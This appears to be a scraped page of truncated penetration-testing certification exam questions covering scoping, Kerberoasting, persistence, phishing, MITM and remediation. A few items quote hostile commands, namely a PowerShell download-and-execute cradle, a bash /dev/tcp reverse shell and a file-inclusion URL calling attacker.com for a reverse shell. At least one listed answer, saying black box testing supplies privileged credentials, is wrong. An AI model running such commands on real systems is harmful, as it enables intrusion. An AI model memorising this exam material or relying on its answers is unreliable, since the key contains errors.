web analytics

Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?

Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads? A. Creating a scope

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use? A. HKEY_CLASSES_ROOT B. HKEY_LOCAL_MACHINE C. HKEY_CURRENT_USER D. HKEY_CURRENT_CONFIG

In which of the following scenarios would a tester perform a Kerberoasting attack?

In which of the following scenarios would a tester perform a Kerberoasting attack? A. The tester has compromised a Windows device and dumps the LSA secrets. B. The tester needs

Which of the following excerpts would come from a corporate policy?

Which of the following excerpts would come from a corporate policy? A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric. B. The help desk can

Which of the following BEST describes the actions performed by this command?

Consider the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1″);Invoke-Cmdlet Which of the following BEST describes the actions performed by this command? A. Set the execution policy. B. Execute a

During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?

During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them? A. Locating emergency exits B. Preparing a pretext C.

A penetration tester is performing a code review. Which of the following testing techniques is being performed?

A penetration tester is performing a code review. Which of the following testing techniques is being performed? A. Dynamic analysis B. Fuzzing analysis C. Static analysis D. Run-time analysis Answer:

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy? A. Enable HTTP Strict Transport

A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company’s intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?

A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for

An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?

An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company’s software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company’s software baseline. Which of the following should the penetration tester perform

Which of the following remediation steps should be taken to prevent this type of attack?

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of

A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform? A. Vulnerability scan B. Dynamic scan C.

An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:

An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk

A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ”changepass.” -sr-xr-x 1 root root 6443 Oct 18

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all

During testing, a critical vulnerability is discovered on a client’s core server. Which of the following should be the NEXT action?

During testing, a critical vulnerability is discovered on a client’s core server. Which of the following should be the NEXT action? A. Disable the network port of the affected service.

Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?

Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of? A. Lockpicking B. Egress sensor triggering C.

The following line was found in an exploited machine’s history file. An attacker ran the following command:

The following line was found in an exploited machine’s history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Which of the following describes what the

Which of the following are MOST important when planning for an engagement? (Select TWO).

Which of the following are MOST important when planning for an engagement? (Select TWO). A. Goals/objectives B. Architectural diagrams C. Tolerance to impact D. Storage time for a report E.

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants

Which of the following commands starts the Metasploit database?

Which of the following commands starts the Metasploit database? A. msfconsole B. workspace C. msfvenom D. db_init E. db_connect Answer: A

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this? A. Manufacturers developing IoT devices are

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow? A. Stack pointer register B. Index pointer register C.

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application,

Which of the following is an example of a spear phishing attack?

Which of the following is an example of a spear phishing attack? A. Targeting an executive with an SMS attack B. Targeting a specific team with an email attack C.

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is

A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s source IP addresses to the client’s IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester’s source IP addresses should be whitelisted?

A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s

Which of the following commands should the malicious user execute to perform the MITM attack?

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below: IP: 192.168.1.20 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168.1.254 DHCP: 192.168.1.253 DNS: 192.168.10.10,

A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).

A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information? A. MAC address of the client

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO). A. Shodan B. SET C. BeEF D. Wireshark E. Maltego F. Dynamo Answer: AE

Black box penetration testing strategy provides the tester with:

Black box penetration testing strategy provides the tester with: A. a target list B. a network diagram C. source code D. privileged credentials Answer: D

A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation? A. Stored XSS B. Fill

A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?

A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service? A. arpspoof B. nmap C. responder

Which of the following is the reason why a penetration tester would run the chkconfig –del command at the end of an engagement? servicename

Which of the following is the reason why a penetration tester would run the chkconfig –del command at the end of an engagement? servicename A. To remove the persistence B.

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have

Which of the following situations would cause a penetration tester to communicate with a system owner/ client during the course of a test? (Select TWO.)

Which of the following situations would cause a penetration tester to communicate with a system owner/ client during the course of a test? (Select TWO.) A. The tester discovers personally